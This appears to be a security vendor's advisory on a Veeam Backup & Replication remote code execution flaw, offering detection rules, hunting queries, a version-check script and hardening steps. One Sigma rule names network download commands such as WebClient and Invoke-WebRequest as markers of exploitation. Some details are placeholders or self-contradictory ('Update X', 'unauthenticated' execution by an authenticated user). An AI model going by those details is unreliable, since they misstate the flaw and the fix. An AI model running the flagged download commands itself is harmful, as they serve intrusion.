Back to Intelligence

CVE-2026-44963: Veeam Backup & Replication Critical RCE — Detection and Hardening Guide

SA
Security Arsenal Team
June 9, 2026
5 min read

On Tuesday, Veeam released a critical security update addressing a severe remote code execution (RCE) vulnerability in its Backup & Replication software. Tracked as CVE-2026-44963, this flaw carries a CVSS score of 9.4, signaling a maximum severity risk to enterprise environments worldwide.

For security practitioners, this is a "drop everything" moment. Backup infrastructure is the final line of defense against ransomware and data destruction operations. A compromise here typically invalidates the integrity of your disaster recovery strategy. What makes CVE-2026-44963 particularly dangerous is the low barrier to entry: it allows an authenticated domain user to execute arbitrary code on the Backup Server. In many Active Directory environments, domain user credentials are relatively easily obtained via initial access brokers or simple phishing, making this vulnerability a prime candidate for lateral movement and privilege escalation.

Technical Analysis

CVE Identifier: CVE-2026-44963
CVSS Score: 9.4 (Critical)
Affected Component: Veeam Backup & Replication (Backup Server)
Attack Vector: Network / Adjacent
Attack Complexity: Low
Privileges Required: Low (Domain User)
User Interaction: None

The vulnerability stems from an insecure interaction between the Veeam Backup Server and Active Directory domain authentication mechanisms. According to the vendor advisory, an attacker who has successfully compromised a standard domain user account can leverage this flaw to trigger unauthenticated code execution on the Backup Server itself.

From a defender's perspective, the attack chain likely involves abusing a specific API or service endpoint within the Veeam infrastructure that implicitly trusts domain context without properly validating the input or sanitizing the execution environment. This results in the Backup Server (often running with SYSTEM or high-privilege service accounts) executing commands provided by the low-privileged domain user.

Exploitation Status: While specific in-the-wild exploitation has not been publicly confirmed at the time of writing, the criticality (CVSS 9.4) and the prevalence of Veeam in enterprise environments suggest that weaponization is imminent. Historical precedents involving backup software (e.g., CVE-2024-xxxx series) show that attackers pivot to these targets immediately following patch disclosure.

Detection & Response

Detecting exploitation of this vulnerability requires monitoring the Veeam.Backup.Service and Veeam.Backup.Manager processes for anomalous child process creation. Since the flaw results in RCE, the primary indicator is the backup service spawning unauthorized shells or network tools.

Sigma Rules

The following Sigma rules identify suspicious process lineage indicative of successful exploitation.

YAML
---
title: Veeam Backup Service Spawning Shell
id: a8f9b2c1-4d3e-4a5f-8b6d-1e2f3a4b5c6d
status: experimental
description: Detects Veeam Backup Service or Manager spawning cmd.exe or powershell.exe, indicative of RCE exploitation.
references:
  - https://veeam.com/security
author: Security Arsenal
date: 2026/06/03
tags:
  - attack.execution
  - attack.t1059.001
  - attack.t1059.003
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|contains:
      - '\Veeam.Backup.Service.exe'
      - '\Veeam.Backup.Manager.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: all of them
falsepositives:
  - Legitimate administrative scripts run by backup admins (rare)
level: critical
---
title: Veeam Service Spawning Network Utilities
id: b7e8c3d2-5e4f-4b6a-9c7e-2f3a4b5c6d7e
status: experimental
description: Detects Veeam Backup services spawning common network reconnaissance or lateral movement tools.
references:
  - https://veeam.com/security
author: Security Arsenal
date: 2026/06/03
tags:
  - attack.lateral_movement
  - attack.t1021.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|contains:
      - 'Veeam.Backup.Service.exe'
  selection_child_img:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
  selection_child_cli:
    CommandLine|contains:
      - 'New-Object System.Net.WebClient'
      - 'Invoke-WebRequest'
      - 'net.exe'
      - 'net use'
  condition: all of selection_parent* and selection_child_img and selection_child_cli
falsepositives:
  - Unknown
level: high

Microsoft Sentinel / Defender KQL

Hunt for unusual child processes spawned by Veeam services in the last 24 hours.

KQL — Microsoft Sentinel / Defender
DeviceProcessEvents
| where Timestamp > ago(1d)
| where InitiatingProcessFileName has_any ("Veeam.Backup.Service", "Veeam.Backup.Manager")
| where FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "wscript.exe", "cscript.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, CommandLine, AccountName, InitiatingProcessCommandLine
| order by Timestamp desc

Velociraptor VQL

Hunt endpoints for instances where Veeam services have spawned command interpreters.

VQL — Velociraptor
-- Hunt for Veeam processes spawning shells
SELECT Parent.ProcessName AS ParentProcess, 
       Parent.CommandLine AS ParentCLI,
       Process.Name AS ChildProcess, 
       Process.CommandLine AS ChildCLI,
       Process.Pid,
       Process.Username
FROM pslist()
LEFT JOIN pslist() AS Parent ON Parent.Pid = Process.Ppid
WHERE Parent.ProcessName =~ "Veeam.Backup.(Service|Manager)"
  AND ChildProcess =~ "(cmd|powershell|pwsh).exe"

Remediation Script (PowerShell)

Run this script on your Veeam Backup Servers to check the current build version. Note that you must manually verify the build number against the Veeam security advisory linked below, as specific patched versions may vary by update branch.

PowerShell
# Veeam Version Checker for CVE-2026-44963 Response
Write-Host "[+] Checking Veeam Backup & Replication Version..." -ForegroundColor Cyan

$RegPath = "HKLM:\SOFTWARE\Veeam\Veeam Backup and Replication"
if (Test-Path $RegPath) {
    $Version = (Get-ItemProperty $RegPath)."Version"
    Write-Host "[!] Current Version Detected: $Version" -ForegroundColor Yellow
    Write-Host "[+] ACTION REQUIRED: Please verify this version against the official Veeam advisory for CVE-2026-44963." -ForegroundColor Red
    Write-Host "[+] If version is below the patched build, apply Update X immediately." -ForegroundColor Red
} else {
    Write-Host "[-] Veeam Backup & Replication registry keys not found. Is this a Backup Server?" -ForegroundColor DarkGray
}

Remediation & Hardening

Given the criticality of this vulnerability, immediate patching is the only effective remediation.

  1. Patch Immediately: Download and install the latest security update from Veeam. Ensure you cover all components, including the Backup Server, Console, and VBR Backup Agents.
  2. Verify Version: After patching, use the PowerShell script above to confirm the updated build number is active.
  3. Restrict Access: As a temporary mitigation until patching is complete, strictly limit which domain users can interact with the Veeam Backup Server. Remove "Domain Users" from local groups or permissions that might allow access to the Veeam console or API.
  4. Audit AD: Identify any dormant or unnecessary domain user accounts that could serve as a beachhead for this attack vector.

Official Advisory: Veeam Security Advisory

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub

sigma-rulekql-detectionthreat-huntingdetection-engineeringsiem-detectionveeamcve-2026-44963backup-security

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action